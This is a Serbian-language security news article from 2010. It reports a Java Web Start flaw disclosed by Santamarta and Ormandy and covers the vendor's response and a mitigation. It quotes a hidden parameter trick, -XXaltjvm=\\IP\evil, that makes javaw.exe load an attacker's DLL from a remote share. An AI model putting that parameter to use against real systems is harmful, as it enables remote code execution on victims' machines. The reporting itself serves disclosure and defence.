Ozbiljan propust u novoj verziji Java pogađa sve aktuelne verzije Windows-a
Vesti, 12.04.2010, 01:37 AM

Postoji ranjivost u Java koja predstavlja ozbiljan problem jer ostavlja korisnike svih aktuelnih verzija Windows-a otvorenim za napade koji mogu dovesti do potpunog kompromitovanja pogođenog sistema. Dva istraživača su nezavisno jedan od drugog u petak objavili informacije o ranjivosti, tvrdeći da je ova ranjivost prisutna u okviru Java godinama unazad.
Problem leži u Java Web Strat framework, tehnologiji koju je razvio Sun Microsystems kako bi se omogućila jednostavnija primena Java aplikacija. U suštini, JavaWS tehnologija ne proverava parametre koje dobija od komandne linije, pa napadači mogu kontolisati ove parametre korišćenjem posebnih HTML oznaka na web strani, rekao je Ruben Santamarta u svom članku objavljenom u petak.
Tavis Ormandy je istog dana objavio svoj tekst o ovom nedostatku u Full Disclosure mailing list-u. Ormandy smatra da deaktiviranje Java dodatka nije dovoljno za prevenciju eventualnog iskorišćavanja ovog propusta, zbog toga što je ranjivi deo zasebno instaliran.
Ukratko, ukoliko imate poslednju verziju Java na svom kompjuteru, možete se smatrati pogođenim ovim propustom.
„Java.exe i javaw.exe podržavaju nepisani sakriveni parametar komandne linije „-XXaltjvm" i "-J-XXaltjvm" (videti -J switch u javaws.exe). Ovo upućuje Java da učita alternativnu JavaVM biblioteku (jvm.dll ili libjvm.so) sa željene putanje (path). Igra je završena. Možemo setovati -Xxaltjvm=\\IP\evil, na ovaj način javaw.exe će učitati naš loš jvm.dll. Bye, bye ASLR, DEP...“, piše Santamarta.
S obzirom da JavaWS tehnologija uključuje Java Runtime okruženje, koje se koristi u većini browser-a, ranjivost pogađa sve ove programe, uključujući Firefox, Internet Explorer i Chrome, na svim verzijama Windows-a, počev od Windows 2000 do Windows 7, tvrdi Santamarta. Browseri koji rade na Apple-ovom Mac OS X nisu ovim pogođeni.
U svom članku Ormandy kaže da je obavestio Sun o ovoj ranjivosti ali da proizvođač nije poverovao da je problem dovoljno ozbiljan i da zahteva urgentnu zakrpu.
„Programske alatke omogućavaju samo minimum provere URL parametara, dopuštajući nam dodavanje proizvoljnih parametara javaws programu, što obezbeđuje dovoljnu funkcionalnost preko komandne linije dozvoljavajući ovoj grešci da bude iskorišćena. Lakoća sa kojom ova greška može biti otkrivena uverila me je da je objavljivanje ovog dokumenta u najboljem interesu svih nas osim proizvođača,” kaže dalje u svom članku Ormandy.
Ovaj problem se može izbeći deaktiviranjem JavaWS i Java.exe, kaže Santamarta u svom postu.
Julien Tinnes daje dodatne informacije o ovoj vrsti Java ranjivosti.
Izvor: http://threatpost.com/en_us/blogs/serious-new-java-flaw-affects-all-browsers-040910
Izdvojeno
Google Chrome prelazi na dvonedeljni ciklus izdanja
Google je najavio da će Chrome preći sa četvoronedeljnog na dvonedeljni ciklus objavljivanja, što znači da će nove funkcije, ispravke grešaka i... Dalje
Lažni Zoom i Google Meet linkovi instaliraju softver za nadzor na Windows računarima
Istraživači iz kompanije Malwarebytes upozoravaju na fišing kampanju koja koristi Zoom i Google Meet sastanke kako bi korisnike navela da instalira... Dalje
Napadi podržani veštačkom inteligencijom gotovo udvostručeni u 2025.
Broj sajber napada u kojima su napadači koristili veštačku inteligenciju gotovo se udvostručio tokom 2025. godine, navodi se u najnovijem izvešta... Dalje
Microsoft potvrdio da je Copilot zbog greške obrađivao poverljive mejlove
Microsoft je potvrdio da je softverska greška u Microsoft 365 Copilot Chat omogućila AI asistentu da sumira poverljive mejlove, čak i kada su bile ... Dalje
Facebook oglasi šire lažno Windows 11 ažuriranje
Istraživači iz kompanije Malwarebytes upozoravaju da sajber-kriminalci koriste plaćene Facebook oglase koji imitiraju Microsoft promocije za Window... Dalje
Pratite nas
Nagrade






Pratite nas preko RSS-a





